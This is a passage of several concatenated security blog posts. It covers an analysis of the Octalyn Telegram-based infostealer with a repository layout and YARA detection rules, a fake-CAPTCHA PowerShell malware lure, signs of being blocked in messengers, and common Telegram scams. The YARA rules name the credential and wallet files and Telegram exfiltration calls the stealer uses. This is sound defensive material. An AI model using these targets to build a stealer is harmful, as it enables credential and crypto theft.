The malware targets Windows systems from XP all the way up to Windows 11, which means it’s not particularly picky about its victims. Whether you’re running that ancient XP machine in your garage or the latest Windows 11 setup, Octalyn doesn’t discriminate – it’s an equal opportunity data thief.

The Telegram Connection: A New Twist

What makes this particular variant interesting is its integration with Telegram for data exfiltration. The “Telegram version” of Octalyn Stealer uses Telegram’s bot API to send stolen data directly to the attacker’s Telegram account. This approach is clever because:

• Telegram traffic appears legitimate to most network monitoring tools
• It’s harder to block than traditional command-and-control servers
• The communication is encrypted by default
• It provides real-time notifications to cybercriminals when new victims are compromised

The GitHub repository shows a polished interface where attackers can configure their Telegram bot token and chat ID, making the whole operation disturbingly user-friendly.

Octalyn-Stealer-C-Telegram/
├── OctalynStealer.sln              # Visual Studio solution file
├── OctalynStealer/                 # Main project directory
│   ├── Program.cs                  # Main entry point for the application
│   ├── Properties/
│   │   ├── AssemblyInfo.cs         # Assembly metadata
│   ├── Config/
│   │   ├── Settings.cs            # Configuration for Telegram bot (e.g., bot token, chat ID)
│   │   ├── telegram.txt           # Output file for Telegram configuration (generated post-build)
│   ├── Modules/
│   │   ├── BrowserStealer.cs      # Logic for stealing browser data (passwords, cookies, history)
│   │   ├── DiscordStealer.cs      # Logic for extracting Discord tokens
│   │   ├── TelegramStealer.cs     # Logic for extracting Telegram session data
│   │   ├── CryptoWalletStealer.cs # Logic for targeting cryptocurrency wallets
│   │   ├── FileGrabber.cs         # Logic for collecting specific files
│   ├── Utils/
│   │   ├── Encryption.cs          # Encryption utilities for data exfiltration
│   │   ├── Network.cs             # Network utilities for sending data to Telegram
│   │   ├── AntiAnalysis.cs        # Anti-sandbox/virtual machine detection
│   ├── bin/
│   │   ├── Debug/
│   │   │   ├── telegram.txt       # Generated file for Telegram bot settings
│   │   │   ├── OctalynStealer.exe # Compiled executable
│   │   ├── Release/
│   ├── obj/                       # Temporary build files

What Does Octalyn Stealer Actually Steal?

Here’s where things get interesting (and by interesting, we mean terrifying). Based on the source code analysis, Octalyn has quite an appetite for your personal information. It specifically targets:

Browser Data

• All stored passwords from Chromium-based browsers
• Non-expired cookies (perfect for session hijacking)
• Complete browsing histories and bookmarks
• Auto-fill information (usernames, personal details, addresses)

Cryptocurrency Assets

Because what’s a modern infostealer without crypto-stealing capabilities? Octalyn targets:

• Browser extensions: MetaMask, Phantom, BitPay, TrustWallet
• Desktop wallets: Exodus, Atomic
• Wallet files and private keys stored locally

Communication Platforms

Your private conversations aren’t so private anymore. The malware harvests data from:

• Discord: Tokens from both stable and Canary versions
• Messaging apps: Telegram, QTox, Signal, Skype, Viber
• Session tokens that can be used to impersonate you

Gaming Platforms

Even your gaming life isn’t safe. Octalyn goes after:

• Minecraft: Session and account tokens
• Steam: Account credentials and session data
• Epic Games: Launcher tokens
• UbiSoft Connect: Account information
• Growtopia: Account details

VPN and Security Software

It also targets Surfshark VPN credentials and configuration data, because apparently, your attempts at privacy are just another challenge to overcome.

How Does Octalyn Stealer Spread?

The distribution methods for Octalyn are as varied as they are concerning. Since the developers are promoting it on GitHub with detailed tutorials (including YouTube videos), different cybercriminal groups can pick it up and distribute it however they see fit. This means you could encounter it through:

• Phishing emails with malicious attachments
• Social engineering tactics designed to trick you into downloading it
• Software cracks and pirated programs – because that “free” Photoshop might cost more than you think
• Malicious online advertisements that redirect to infected downloads
• Infected removable storage devices like USB drives

The malware can disguise itself as legitimate software or hide within seemingly innocent files. It’s particularly fond of masquerading as popular applications or bundling itself with cracked software.

Technical Analysis: Under the Hood

Based on the GitHub repository analysis, Octalyn Stealer consists of two main components:

The Client/Stub (Pascal/Delphi)

• Compiled with optimization flags for maximum speed
• Uses Windows API for file system and registry access
• Implements Winsock API for network communication
• Designed to be lightweight and stealthy

The Control Panel (Delphi)

• User-friendly GUI for configuring the malware
• Telegram bot integration for data exfiltration
• Real-time victim monitoring capabilities
• Cross-platform support (Windows and Linux)

The fact that there are instructional videos on platforms like YouTube showing how to use this malware demonstrates how the cybercrime landscape has evolved. It’s no longer just about technical expertise – it’s about making malware accessible to anyone with malicious intent.

YARA Rules for Detection

For security professionals and researchers, here are comprehensive YARA rules to detect Octalyn Stealer variants. These rules target the malware’s unique characteristics, including its Telegram integration and data theft capabilities:

rule Octalyn_Stealer_Main {
    meta:
        description = "Detects Octalyn Stealer main executable"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        hash = "575f6bde98c678461d47dea3e5dce615ccdb490a096e8b2017176b96d8663af2"
        reference = "https://gridinsoft.com/blogs/octalyn-stealer/"
        
    strings:
        $s1 = "Octalyn" ascii wide
        $s2 = "ZeroTrace" ascii wide
        $s3 = "t.me/ZeroTraceOfficial" ascii wide
        $s4 = "OctalynTelegram" ascii wide
        $s5 = "Stealer" ascii wide
        
        // Telegram bot API strings
        $telegram1 = "api.telegram.org" ascii wide
        $telegram2 = "sendDocument" ascii wide
        $telegram3 = "chat_id" ascii wide
        $telegram4 = "bot_token" ascii wide
        
        // Cryptocurrency wallet targeting
        $crypto1 = "MetaMask" ascii wide
        $crypto2 = "Phantom" ascii wide
        $crypto3 = "Exodus" ascii wide
        $crypto4 = "Atomic" ascii wide
        $crypto5 = "wallet.dat" ascii wide
        
        // Browser data targeting
        $browser1 = "Login Data" ascii wide
        $browser2 = "Web Data" ascii wide
        $browser3 = "Cookies" ascii wide
        $browser4 = "Local Storage" ascii wide
        
        // Gaming platform strings
        $gaming1 = "minecraft" ascii wide nocase
        $gaming2 = "steam" ascii wide nocase
        $gaming3 = "epic games" ascii wide nocase
        $gaming4 = "growtopia" ascii wide nocase
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($s*)) or
            (1 of ($s*) and 2 of ($telegram*)) or
            (3 of ($crypto*)) or
            (3 of ($browser*) and 1 of ($gaming*))
        )
}

rule Octalyn_Stealer_Telegram_Component {
    meta:
        description = "Detects Octalyn Stealer Telegram exfiltration component"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        $api1 = "https://api.telegram.org/bot" ascii wide
        $api2 = "/sendDocument" ascii wide
        $api3 = "/sendMessage" ascii wide
        
        $param1 = "chat_id=" ascii wide
        $param2 = "document=" ascii wide
        $param3 = "caption=" ascii wide
        
        $header1 = "Content-Type: multipart/form-data" ascii wide
        $header2 = "User-Agent:" ascii wide
        
        // Data exfiltration indicators
        $data1 = "passwords.txt" ascii wide
        $data2 = "cookies.txt" ascii wide
        $data3 = "wallets.txt" ascii wide
        $data4 = "tokens.txt" ascii wide
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($api*) and 2 of ($param*)) or
            (1 of ($api*) and 2 of ($data*)) or
            (3 of ($param*) and 1 of ($header*))
        )
}

rule Octalyn_Stealer_Config {
    meta:
        description = "Detects Octalyn Stealer configuration files"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        $config1 = "Telegram Token" ascii wide
        $config2 = "Chat ID" ascii wide
        $config3 = "Build Payload" ascii wide
        $config4 = "Author" ascii wide
        $config5 = "ZeroTrace" ascii wide
        
        $path1 = "\\AppData\\Roaming\\" ascii wide
        $path2 = "\\AppData\\Local\\" ascii wide
        $path3 = "\\Google\\Chrome\\User Data\\" ascii wide
        $path4 = "\\Mozilla\\Firefox\\Profiles\\" ascii wide
        
    condition:
        (3 of ($config*)) or
        (2 of ($config*) and 2 of ($path*))
}

rule Octalyn_Stealer_Behavioral {
    meta:
        description = "Detects Octalyn Stealer behavioral patterns"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        // File system operations
        $fs1 = "FindFirstFile" ascii
        $fs2 = "FindNextFile" ascii
        $fs3 = "CopyFile" ascii
        $fs4 = "CreateDirectory" ascii
        
        // Registry operations
        $reg1 = "RegOpenKeyEx" ascii
        $reg2 = "RegQueryValueEx" ascii
        $reg3 = "RegCloseKey" ascii
        
        // Network operations
        $net1 = "InternetOpen" ascii
        $net2 = "InternetConnect" ascii
        $net3 = "HttpOpenRequest" ascii
        $net4 = "HttpSendRequest" ascii
        
        // Crypto API
        $crypto1 = "CryptUnprotectData" ascii
        $crypto2 = "CryptProtectData" ascii
        
        // Process operations
        $proc1 = "CreateProcess" ascii
        $proc2 = "TerminateProcess" ascii
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (3 of ($fs*) and 2 of ($net*)) or
            (2 of ($reg*) and 2 of ($crypto*)) or
            (4 of ($net*) and 1 of ($proc*))
        )
}

rule Octalyn_Stealer_Delphi_Signature {
    meta:
        description = "Detects Delphi/Pascal compiled Octalyn Stealer variants"
        author = "GridinSoft Security Team"
        date = "2025-01-29"
        
    strings:
        // Delphi/Pascal runtime signatures
        $delphi1 = "Borland" ascii
        $delphi2 = "Embarcadero" ascii
        $delphi3 = "@HandleFinally" ascii
        $delphi4 = "@TryFinallyExit" ascii
        $delphi5 = "System.pas" ascii
        
        // Octalyn specific strings
        $octalyn1 = "Octalyn" ascii wide
        $octalyn2 = "Stealer" ascii wide
        $octalyn3 = "ZeroTrace" ascii wide
        
        // VCL components commonly used
        $vcl1 = "TForm" ascii
        $vcl2 = "TButton" ascii
        $vcl3 = "TEdit" ascii
        $vcl4 = "TMemo" ascii
        
    condition:
        uint16(0) == 0x5A4D and
        (
            (2 of ($delphi*) and 1 of ($octalyn*)) or
            (1 of ($delphi*) and 2 of ($octalyn*) and 1 of ($vcl*))
        )
}

How to Use These YARA Rules

Security professionals can use these YARA rules in various ways:

• Endpoint Detection: Deploy rules on endpoints using YARA-compatible EDR solutions
• Network Monitoring: Use rules to scan network traffic and file transfers
• Malware Analysis: Apply rules during static analysis of suspicious samples
• Threat Hunting: Proactively search for Octalyn variants in your environment

To run these rules, save them to a .yar file and execute:

yara octalyn_rules.yar /path/to/scan/
yara -r octalyn_rules.yar /path/to/directory/

Rule Explanation

Each rule targets different aspects of the malware:

• Octalyn_Stealer_Main: Detects the primary executable using string signatures and functionality indicators
• Octalyn_Stealer_Telegram_Component: Focuses on the Telegram bot API integration for data exfiltration
• Octalyn_Stealer_Config: Identifies configuration files and setup components
• Octalyn_Stealer_Behavioral: Catches the malware based on API calls and behavioral patterns
• Octalyn_Stealer_Delphi_Signature: Specifically targets the Delphi/Pascal compiled variants

These rules are designed to minimize false positives while maintaining high detection rates. They can be customized based on your specific environment and threat intelligence requirements.

Detection Names and Technical Details

Security vendors have been quick to identify Octalyn Stealer, though they each have their own creative names for it:

• Avast: Win32:MalwareX-gen [Trj]
• ESET-NOD32: A Variant Of MSIL/Agent.VJC
• Kaspersky: HEUR:Trojan.Win32.Generic
• Microsoft: Trojan:Win32/Wacatac.B!ml

The fact that it’s getting flagged by multiple security vendors with high confidence levels should tell you everything you need to know about its legitimacy (spoiler: it has none).

Signs Your System Might Be Infected

Octalyn Stealer is designed to operate stealthily, but there are some telltale signs that might indicate its presence:

• Unusual network activity, especially connections to Telegram servers
• Unexpected data usage or network traffic spikes
• Browser settings changing without your input
• Cryptocurrency wallet balances mysteriously decreasing
• Unexpected logouts from various online accounts
• System performance degradation
• Antivirus alerts mentioning the detection names listed above
• Unknown processes running with network access

If you’re experiencing any combination of these symptoms, it’s time to take action. Remember, infostealers like Octalyn work quickly – the longer they remain on your system, the more damage they can do.

How to Remove Octalyn Stealer

If you suspect Octalyn Stealer has made itself at home on your system, here’s how to evict this unwelcome guest:

Step 1: Disconnect from the Internet

First things first – cut off the malware’s communication line. Disconnect your computer from the internet to prevent further data exfiltration while you work on removal. This is especially important with the Telegram variant, as it continuously sends data to the attacker’s account.

Step 2: Boot into Safe Mode

Restart your computer in Safe Mode to limit the malware’s ability to interfere with the removal process. This also prevents it from loading automatically with Windows.

Step 3: Run a Complete System Scan

Download and install Anti-Malware by clicking the button below. After the installation, run a Full scan: this will check all the volumes present in the system, including hidden folders and system files. Scanning will take around 15 minutes.

After the scan, you will see the list of detected malicious and unwanted elements. It is possible to adjust the actions that the antimalware program does to each element: click "Advanced mode" and see the options in the drop-down menus. You can also see extended information about each detection - malware type, effects and potential source of infection.

Click "Clean Now" to start the removal process. Important: removal process may take several minutes when there are a lot of detections. Do not interrupt this process, and you will get your system as clean as new.

Step 4: Check for Persistence Mechanisms

Octalyn might have created scheduled tasks, registry entries, or startup items to ensure it runs every time you boot your computer. A thorough anti-malware scan should catch these, but it’s worth double-checking manually:

• Check Windows startup programs (Task Manager > Startup tab)
• Review scheduled tasks (Task Scheduler)
• Examine browser extensions for suspicious additions
• Look for unknown services running in the background

Step 5: Change All Your Passwords

This is crucial. Since Octalyn specifically targets stored passwords and login credentials, you’ll need to change passwords for:

• All online accounts (email, social media, banking)
• Cryptocurrency wallets and exchanges
• Gaming platforms and digital stores
• Any other services you’ve logged into recently

Step 6: Secure Your Cryptocurrency

If you use cryptocurrency wallets, take immediate action:

• Transfer funds to new wallets with fresh private keys
• Change passwords on all cryptocurrency exchanges
• Enable additional security measures like withdrawal whitelisting
• Monitor your wallets for any unauthorized transactions

Step 7: Enable Two-Factor Authentication

While you’re updating your security, enable two-factor authentication (2FA) on all accounts that support it. This adds an extra layer of protection even if your passwords are compromised.

Step 8: Monitor Your Accounts

Keep a close eye on your financial accounts, cryptocurrency wallets, and other sensitive services for any unauthorized activity. Set up account alerts where possible.

Use Antivirus Software

A good antivirus solution can catch threats like Octalyn before they have a chance to do damage. GridinSoft Anti-Malware offers real-time protection against the latest threats.

Practice Safe Email and Social Media Habits

Don’t open attachments or click links from unknown senders. Even if an email appears to be from someone you know, be cautious – their account might be compromised.

The Bigger Picture: The Democratization of Cybercrime

Octalyn Stealer represents a troubling trend in cybercrime: the democratization of malware development. When such tools are freely available on platforms like GitHub, complete with user manuals and video tutorials, the barrier to entry for cybercrime drops significantly.

This isn’t just about technical sophistication anymore. The Telegram integration shows how cybercriminals are leveraging legitimate services to make their operations more resilient and harder to detect. Unlike ransomware attacks that make their presence known immediately, infostealers work silently in the background, often remaining undetected for months.

The fact that there are instructional videos on YouTube demonstrating how to use this malware is particularly concerning. It shows how cybercriminals are using mainstream platforms to recruit and train new members, turning cybercrime into a more accessible “career path.”

What to Do If You’ve Been Compromised

If Octalyn Stealer has successfully harvested your data, the damage might extend beyond just your computer. Here’s what you should do:

• Contact your bank if you suspect financial information was compromised
• Monitor your credit reports for any suspicious activity
• Consider identity theft protection services if personal information was stolen
• Report the incident to relevant authorities if significant financial loss occurred
• Secure your cryptocurrency by moving funds to new wallets with fresh private keys
• Check your social media accounts for unauthorized posts or messages
• Review your gaming accounts for any suspicious activity or unauthorized purchases

The Bottom Line

Octalyn Stealer is a serious threat that demonstrates how sophisticated and accessible modern malware has become. It’s not content with just disrupting your computer – it wants to steal your entire digital identity and sell it to the highest bidder. The Telegram integration makes it even more dangerous, providing real-time data exfiltration that’s harder to detect and block.

The good news is that with proper security measures and a bit of common sense, you can protect yourself from threats like Octalyn. Keep your software updated, use reputable security solutions, and remember that if something seems too good to be true (like free premium software or “educational” hacking tools), it probably is.

Stay safe out there, and be especially wary of anything that claims to be “educational” but involves stealing other people’s data.

The post Octalyn Stealer: How This Threat Steals Passwords, Crypto & Browser Data appeared first on Gridinsoft Blog.

Telegram Captcha Exploits PowerShell to Spread Malware

Cybercriminals have upped their game again, now using Telegram as a delivery mechanism for malware under the guise of a CAPTCHA verification system. Leveraging the news about Ross Ulbricht, the infamous Silk Road creator, they lure unsuspecting users into running malicious PowerShell scripts.

Ross Ulbricht, the guy who ran Silk Road (a dark web marketplace for all things illegal), was sentenced to life in 2015, which caused mixed reactions among the public. Former President Trump added fuel by hinting at a pardon, which he finally granted yesterday.

Threat actors seized this news to create fake “official” Ulbricht accounts on X (formerly Twitter), directing curious followers to malicious Telegram channels. On these Telegram channels, users are greeted with a “Safeguard” identity verification aka CAPTCHA. Sounds legit, right?

Except this “verification” process ends with a malicious twist. Users are tricked into running PowerShell commands under the pretense of proving they’re not bots. Here’s the kicker: instead of validating your humanity, the commands download and execute malware.

How the Scam Works?

This is not a new scam method, and I have described it several times before. The only difference is that instead of fake websites, a telegram channel is used. The attack can be divided into 3 parts. The fake verification starts with a mini app that copies a PowerShell command to your clipboard.

Next, users are instructed to paste and execute the command in the Windows Run dialog. The PowerShell command downloads a ZIP file from “http://openline[.]cyou”. Inside, there’s an executable named “identity-helper.exe”, flagged by VirusTotal as a possible Cobalt Strike loader.

Cobalt Strike is a legitimate penetration testing tool often abused by hackers. Once deployed, it provides remote access to compromised systems and their networks. Infections like this frequently pave the way for ransomware or data theft. So, running that PowerShell command is basically handing your computer to the bad guys with a bow on top.

Although this is an obvious ploy from a technical standpoint, average users fall for it, generating demand. To protect yourself, remember one thing – no captcha requires you to paste anything into PowerShell. If you are asked to paste something in, it is a scam.

The post Ross Ulbricht Telegram Captcha Scams On the Rise, Beware! appeared first on Gridinsoft Blog.

How User Blocking Works in Messaging Apps

Blocking a user in a messaging app prevents the blocked person from:

• sending messages to the contact who blocked them (the messages will not be delivered);
• seeing profile information (photo, online status, etc.);
• making voice calls;
• adding the blocker to group chats.

If you’re having trouble communicating in a messenger, it’s possible you’ve been blocked. However, each messenger guarantees user privacy and confidentiality. From the outside, privacy settings and contact blocking can sometimes look similar.

Simply put, blocking in messaging apps works like a glass jar. Its barrier is invisible, but you can feel it:

• You can see the profile of the person who blocked you and read the chat history (the contact remains in your list);
• But you can’t “reach” them (your messages won’t go through);
• The other person doesn’t “hear” you (they don’t receive your messages);
• This “jar” is completely airtight (there’s no way around the block);
• The other person can remove this transparent barrier at any time (by unblocking you).

Reasons for blocking can be anything from differences of opinion to so-called “ghosting.” Ghosting is when someone abruptly stops communicating without explanation and ignores all attempts to get in touch.

After you’ve been unblocked, the recipient won’t see any messages you sent while you were blocked. However, from the unblocked user’s perspective, those previously sent messages will appear as delivered.

Key Signs of Being Blocked in Messengers

You, as usual, see the chat with your conversation and can write a message, but you feel that something is not quite right.

You should not expect a pop-up or for the messenger itself to notify you about the block. If you suspect that you have been blocked, check the signs listed below.

1. Checking the Message Status

Confusion regarding the message status is one of the clear signs of being blocked.

The popularity of messengers depends on how convenient they are for users, and this makes their functionality somewhat similar.

For ease of communication, messengers have status checkmarks in the lower-right corner of a message. The only difference is in the color of the checkmark (green for Telegram, blue for WhatsApp) and small nuances specific to each messenger.

For Telegram:

• One checkmark — the message has been delivered but not yet read.
• Two checkmarks — the message has been read by the recipient.

In WhatsApp:

• One gray checkmark — the message has been sent to the recipient.
• Two gray checkmarks — the message has been delivered, but the recipient has not opened the chat yet.
• Two blue checkmarks — the message has been read.

Two gray checkmarks in WhatsApp can be ambiguous. If the person has disabled read receipts, then none of their contacts will see blue checkmarks, even if the messages were read.

If your contact has blocked you in the messenger, your message will not be received — you will only see one gray checkmark.

There will also be no second checkmark if the recipient’s phone is turned off, they have deleted the messenger app, there are issues with internet access, or the recipient has not yet had a chance to read your message.

2. Access to Profile Information

An “empty” profile is the second important sign. If you have been blocked, the messenger will hide from you:

• the profile picture of the person who blocked you;
• their online presence;
• the time of their last visit.

After a block, Telegram hides the contact’s photo and changes their status to “Was online a long time ago.” In WhatsApp, the indication of the last seen time and/or the online status simply disappears.

The privacy settings of many messengers allow you to hide profile information. A user can hide their profile picture through privacy settings or simply use one standard “placeholder” instead of an avatar.

WhatsApp usually shows the exact time when the user was last online or removes this status entirely. If you have hidden your own last seen time in the settings, you will not be able to see others’ as well.

Depending on privacy settings, Telegram either shows the exact time or an approximate status (“Recently“). After a block, this status changes to “A long time ago.” It’s typically assigned to deleted or inactive accounts. If this status appeared literally yesterday, it’s a clear sign you’ve been blocked.

By default, Telegram shows when a contact is online. If a user has completely hidden their online presence in the settings, the status indicator will appear when they start typing a message to you.

3. Adding to Groups

The inability to invite someone to a group or chat is the clearest sign of being blocked. Try adding the contact to a new group or group chat. If you’ve been blocked, a notification will pop up indicating that you can’t perform this action.

If you were both in the same group chats before you were blocked, you’ll still be able to see their messages there, but you won’t be able to send them a private message.

It’s important to respect personal boundaries. While testing to see if you can interact with someone’s account is effective, a person who suddenly finds themselves added to a random group may be surprised and have questions.

If you can’t add someone to a group, this by itself (without any other signs) doesn’t necessarily mean you’ve been blocked. The user might have disabled the option for others to add them to chats.

4. Checking the Connection

Try calling through the app. If you’ve been blocked, it won’t work.

The difference is that in Telegram, the call is dropped immediately. In WhatsApp, it will feel like it’s ringing endlessly without connecting.

If the recipient isn’t online or their phone is turned off, the call will also be dropped immediately. Or the other person may have disabled voice calls in their privacy settings.

5. Reaching Out

Usually, when people cut off contact, they cut it off everywhere. The last check is to find the recipient on social networks or through another messenger to see if you’ve been blocked there as well.

Because blocking a contact doesn’t remove the phone number from the address book, you can still try to reach out to the person directly.

If it’s appropriate and your relationship allows it, you can ask the person who blocked you what happened. Perhaps it’s simply a misunderstanding or a reaction made in the heat of the moment—like after a heated discussion.

By the end of your check, you’ll understand the reason for undelivered messages: a block, an issue with the messenger’s server, or the recipient’s busy schedule. It might be that they don’t hold a grudge; they just didn’t have time to respond.

Checklist of Signs You’ve Been Blocked in a Messenger

• Only one checkmark in the lower right corner of your messages;
• You are the only one among mutual acquaintances who doesn’t see the blocker’s profile photo;
• No information about the user’s last online time is shown;
• Your messages remain unread for a very long time;
• You can’t add the contact to a group or chat;
• You can’t reach the contact by messenger call;
• The recipient has blocked you not only in the messenger but also on social networks.

The post You’ve Been Blocked in Messaging Apps appeared first on Gridinsoft Blog.

What are Telegram Scams?

Telegram scams are deceptive schemes that operate within the Telegram messaging platform or use it as a gateway to lure victims to malicious third-party sites. Scammers are attracted to Telegram because of its massive user base, minimal signup requirements (only a phone number is needed), and features like anonymous messaging and bot capabilities.

According to cybersecurity reports, Telegram-based scams increased by 43% in 2024, with financial losses exceeding $200 million globally. These scams range from traditional phishing attempts to highly sophisticated bot-powered operations masquerading as legitimate customer service or investment opportunities.

The most common Telegram scam methods include:

• Phishing attacks – Scammers pose as trusted contacts or support agents to trick victims into revealing sensitive personal information
• Off-platform fraud – Directing users away from Telegram to malicious websites that steal information or distribute malware
• Bot-powered scams – Using automated Telegram bots to target vulnerable users at scale (in 2020, Telegram blocked approximately 350,000 bot accounts for fraudulent activities)
• Cryptocurrency fraud – Targeting crypto enthusiasts with fake investment opportunities, exchange platforms, or wallet access schemes

As Telegram continues to grow in popularity, scammers develop increasingly sophisticated methods to exploit unsuspecting users. Recent research by Intel 471 identified dangerous malware like the X-Files bot that can steal passwords, session cookies, login credentials, and even credit card details from Telegram users. Let’s examine the top 11 Telegram scams you need to watch out for in 2025.

1. Fake Telegram Channels and Groups

Telegram channels and groups are community spaces where users with shared interests gather. Unfortunately, scammers frequently create convincing “copycat” versions of popular channels to trap unsuspecting victims.

These imposter channels meticulously mimic legitimate ones, featuring nearly identical:

• Channel names and profile images
• Anchored posts and content format
• Administrator accounts with similar or identical usernames
• Active “user” discussions (often about cryptocurrency promotions or investment opportunities)

How to Identify Fake Telegram Channels

When you join a new Telegram group, check if you can send messages. If that option is unavailable, it’s a “broadcast-only” channel where only administrators can post messages. While this isn’t inherently suspicious (many legitimate channels are broadcast-only), it’s an important feature to understand when evaluating a channel’s authenticity.

Protection Tips:

• Report suspicious channels and impostor accounts to Telegram
• Adjust your privacy settings to prevent anyone from adding you to groups without your permission
• Verify official channels through the organization’s website or other trusted sources
• Be wary of channels that pressure you to make financial decisions quickly

2. Telegram Crypto Expert Scams

Telegram has become the preferred platform for cryptocurrency enthusiasts and investors, which unfortunately makes it a prime target for crypto scammers. These criminals pose as cryptocurrency experts or investment advisors, promising guaranteed returns on investments.

The typical approach involves:

1. Scammers contact potential victims through Telegram, often after seeing them post in legitimate crypto groups
2. They claim to offer “guaranteed” returns (often 30-50% or more)
3. They show screenshots or charts of supposed successful trades
4. They convince victims to open accounts at “special” or “exclusive” crypto exchanges
5. Initial small investments may show profits to build trust
6. After larger investments are made, the scammers disappear completely

In one documented case, a victim sent $50 in Bitcoin to a fake exchange and quickly saw a $30 “profit.” Convinced, he encouraged several friends to invest their savings. After his friends transferred significant amounts, the fake broker vanished with all the funds.

How to Spot Crypto Expert Scams

According to FBI estimates, approximately 25,000 people fell victim to cryptocurrency fraud last year, with losses approaching $1 billion. The promise of “guaranteed” returns or access to “special” exchanges are reliable indicators of cryptocurrency investment fraud on Telegram.

Protection Tips:

• Ignore anyone who claims to guarantee investment returns, especially with cryptocurrencies
• Avoid “special” or “exclusive” cryptocurrency exchanges that aren’t widely known
• Never send money or cryptocurrency to someone you’ve only communicated with on messaging platforms
• Research all investment opportunities thoroughly before committing any funds

3. Phishing with Telegram Bots

Telegram’s open platform allows users to create and deploy bots, which scammers exploit for sophisticated phishing operations. These bots use natural language processing and AI to engage in convincing conversations, making it difficult to distinguish them from real customer support agents.

In one notable scheme, hackers utilized the SMSRanger bot to impersonate representatives from major financial services like banks, Apple Pay, Google Pay, and PayPal. Security forums report these bots achieve approximately 80% success rates when victims answer their calls. Alarmingly, these bot services can be purchased for as little as $300 per month, making them accessible to many would-be scammers.

A particularly dangerous bot called X-Files has been identified by Intel 471 researchers. This malware can steal passwords, session cookies, login credentials, and credit card details from unsuspecting Telegram users, creating significant security risks.

How to Identify Bot-Powered Phishing

Telegram bot scams display the classic signs of phishing attacks:

• Creating a false sense of urgency
• Communications from unusual or suspicious phone numbers
• Grammatical errors and awkward phrasing
• Requests for sensitive information like passwords or account numbers
• Pressure to take immediate action

Protection Tips:

If you receive a call from someone claiming to represent your bank or another financial institution, hang up and call the organization directly using their official phone number. Remember that scammers can spoof caller IDs to make their calls appear legitimate.

Legitimate companies never contact customers through Telegram or other third-party messaging platforms for account verification or financial matters.

4. Telegram Tech Support Scams

Tech support scams on Telegram involve fake accounts that impersonate legitimate customer service representatives. These scammers use sophisticated bots to monitor groups and channels for specific keywords, then contact potential victims claiming to offer technical assistance.

During these interactions, scammers typically:

• Request sensitive account information under the guise of verification
• Charge fees for “premium” support services
• Request remote access to your device to “fix” issues
• Pressure you to make payments to “upgrade” or “verify” your account

How to Identify Tech Support Scams

If you’re experiencing issues with a service or platform, always initiate contact through official channels rather than responding to unsolicited support offers. Be especially cautious of accounts that contact you first with support offers or those that charge for assistance that should be provided for free.

Protection Tips:

• Verify account usernames against displayed names (they should match)
• Report suspicious accounts to both Telegram and the company being impersonated
• Never pay for support services unless you’re absolutely certain they’re legitimate
• Contact companies directly through their official websites when you need support

5. Cryptocurrency Giveaway Scams

Fake giveaways are among the oldest scam tactics, now adapted for Telegram and cryptocurrency. In these schemes, bots or users claim to offer prizes from well-known companies (such as Amazon, Apple, or cryptocurrency exchanges like Binance or Coinbase).

To claim the supposed prize, victims must typically:

• Provide banking details and personal information
• Pay a “processing fee” or “verification deposit”
• Submit cryptocurrency wallet credentials
• Complete “verification” processes that steal personal data

How to Identify Cryptocurrency Giveaway Scams

While legitimate companies occasionally run promotions and giveaways, unsolicited offers of free cryptocurrency or prizes you never entered to win are almost certainly fraudulent. If you’re unsure about a promotion, contact the company directly through their official website to verify its legitimacy.

Protection Tips:

• Never pay fees to claim prizes, especially through cryptocurrency or payment apps like Zelle, Venmo, or Cash App
• Block and report accounts offering unsolicited prizes or giveaways
• Remember that legitimate giveaways never require payment to participate or claim prizes
• Verify any promotion through the company’s official website or social media accounts

6. Fake Admin Accounts

While Telegram usernames must be unique, scammers create accounts with names that closely resemble official administrators or support staff. These accounts often contact users after they post questions in public groups, offering to “help” resolve issues.

Their actual goals typically include:

• Gaining access to your account through verification codes or passwords
• Directing you to phishing sites that mimic legitimate login pages
• Collecting personal information under the pretense of account verification
• Installing malware on your device through deceptive downloads

How to Identify Fake Admin Accounts

Pay close attention to account names, looking for subtle misspellings or letter substitutions. For example, “TichSupport” instead of “TechSupport,” or “BitgetToken” instead of “bitgetEN.” Sometimes the username may be hidden entirely. Be particularly cautious of users who initiate private messages rather than responding publicly in a group.

Protection Tips:

• Never share personal information or passwords in direct messages
• Search the group for previous messages from users who contact you privately — if none exist, they’re likely imposters
• Report fraudulent accounts to both Telegram and the company being impersonated
• Remember that legitimate administrators typically respond in public channels first

7. Classiscam: Fake Classified AD Scams

The “Classiscam” scheme is a sophisticated Telegram-based fraud operation that has netted criminals over $6.5 million from victims. These scams involve creating fake listings for popular consumer electronics on classified ad sites, then directing interested buyers to continue the transaction via Telegram.

The complete scam typically operates as follows:

1. Scammers create attractive listings for products like laptops, cameras, or iOS devices on popular marketplace sites
2. The listing directs potential buyers to Telegram for “faster communication”
3. On Telegram, the victim connects with a bot designed to steal personal information
4. Alternatively, the scammer sends a link to a fake marketplace page that mimics legitimate sites like Facebook Marketplace or Craigslist
5. To “complete” the purchase, victims are asked for their address, credit card details, and other personal information

How to Identify Classiscam Operations

Watch for red flags in online marketplace listings, such as suspiciously low prices and sellers who insist on communicating through Telegram rather than the platform’s built-in messaging system. If directed to an external website, check for design inconsistencies, spelling or grammar errors, and unsecured URLs (those beginning with “http://” rather than “https://”).

Protection Tips:

• Always inspect items in person before purchasing when possible
• Use secure payment platforms that offer buyer protection, such as PayPal or credit cards
• Never continue marketplace transactions on Telegram or other messaging platforms
• Be skeptical of deals that seem too good to be true

8. “Pump And Dump” in Telegram Crypto Channels

“Pump and dump” schemes involve artificially inflating the price of an asset (usually a cryptocurrency with a small market cap) through coordinated buying, then selling it at the inflated price before it crashes. On Telegram, these schemes operate through dedicated channels where administrators claim to have “insider knowledge” about upcoming price movements.

These scams often take the following structure:

• Channel administrators acquire a position in a little-known cryptocurrency
• They promote the cryptocurrency to channel members, creating artificial buying pressure
• As prices rise due to coordinated buying, the administrators sell their holdings
• The price subsequently collapses, leaving regular investors with significant losses
• Many channels charge “VIP membership” fees, creating a double revenue stream for scammers

How to Identify Pump and Dump Schemes

These fraudulent Telegram channels often describe themselves as “signal groups” and create a sense of urgency to pressure members into acting quickly. They typically emphasize the fear of missing out (FOMO) on supposedly lucrative opportunities and make grandiose claims about potential returns.

